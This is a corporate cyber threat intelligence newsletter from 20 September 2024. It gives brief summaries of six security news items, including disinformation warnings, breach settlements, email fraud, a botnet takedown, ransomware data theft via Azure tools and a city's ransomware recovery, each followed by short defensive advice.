20 September 2024

6 min read

US warns of widespread disinformation campaigns | Cyber Intelligence Briefing: 20 September

September 2024
Cyber Intelligence Briefing

Top news stories this week

  1. Fake news. US warns of widespread disinformation campaigns.
  2. Settle up. 23andMe, Lehigh Valley Health Network (LVHN), and AT&T reach settlements over their past data breaches.
  3. BEC barrage. US government agencies and Tennessee school district fall victim to separate email scams.  
  4. Botnet busted. FBI takes down China-linked botnet.
  5. Under the radar. Ransomware groups exploit Microsoft Azure to exfiltrate data.
  6. Out of commission. City of Colombus’ systems still partly down two months after cyber attack.

 

1. The US warns of widespread disinformation campaigns

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have alerted the public of global disinformation campaigns. They have warned that Kremlin-backed media outlets in democracies around the world are hiding Russian cyber spies and are actively working to sow discord. In response, Meta has banned Russian state-owned media accounts from its social media platforms.

So What?

The spreading of disinformation could become another vector for threat actors to gain access to the organisational networks, either through phishing or scam campaigns. Organisations and individuals should stay vigilant when receiving information from unverified sources.

[Researcher: Milda Petraityte] 


2. 23andMe, LVHN, and AT&T reach settlements over their past data breaches

Several companies have agreed to substantial settlements following data breaches in 2023. 23andMe will pay USD 30 million, Lehigh Valley Health Network will pay USD 65 million, and AT&T has settled for USD 13 million with the Federal Communications Commission. These settlements aim to compensate affected data subjects.

So what?

Data breaches can result in significant costs from lawsuits and fines if data protection measures are inadequate and if the incident is not handled effectively.

[Researcher: Aditya Ganjam Mahesh]


3. US government agencies and Tennessee school district fall victim to separate BEC scams

The US Department of Justice indicted a Chinese national for spear phishing US government agencies including NASA, the US Air Force, and the Federal Aviation Administration to steal aerospace technology and commit wire fraud.

Separately, an employee in a northeast Tennessee school district sent USD 3.4 million to a fake curriculum vendor, believing the funds were for legitimate online curriculum materials. The investigation revealed that several individuals had unknowingly fallen victim to this Business Email Compromise (BEC) fraud campaign.

So what?

Government agencies and organisations alike should implement regular training and awareness programmes for their staff as phishing techniques become more complex. Watch S-RM’s latest webinar on the rising threat of BECs and their impact on the broader threat landscape.

[Researcher: Lawrence Copson]


4. FBI busts Chinese-linked botnet with over 200,000 devices infected 

A court-sanctioned law enforcement operation has dismantled a botnet that infected over 200,000 devices worldwide. Court documents reveal that Integrity Technology Group, a publicly traded company in Beijing, developed and controlled the botnet, linked by the FBI to China-based hackers “Flax Typhoon”.

SO WHAT? 

Regularly updating and patching systems and software is crucial to remove exploitable vectors of compromise.

[Researcher: Lena Krummeich]


5. Hackers exploit Microsoft Azure to exfiltrate data during ransomware attacks

Rhysida, BianLian and other ransomware groups are using Microsoft’s Azure Storage Explorer and a data transfer tool named AzCopy to steal files from compromised systems. After installing Azure, hackers transfer the victim’s data to their own cloud storage.

SO WHAT? 

Threat actors are increasingly weaponising native tooling to evade detection, making it harder for network security to detect illegitimate Microsoft traffic. Organisations should closely monitor for the suspicious use of these tools.

[Researcher: Adelaide Parker]


6. City of Colombus’ systems still down two months after cyber attack

The City of Colombus in Ohio has confirmed that 21 percent of its systems are still down and 8 percent are only partially functional after a Rhysida ransomware attack in July 2024. Following the attack, the city’s mayor approved USD 4 million to help recover from the incident.

So what?

A regularly tested disaster recovery plan can help ensure there is minimal downtime following a cyber incident.

[Researcher: David Broome]

 

SUBSCRIBE TO RECEIVE OUR WEEKLY CYBER THREAT INTELLIGENCE BRIEFING VIA EMAIL

The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.

To discuss this briefing or other industry developments, please reach out to one of our experts.

Editors

Share this post

Subscribe to our insights

Get industry news and expert insights straight to your inbox.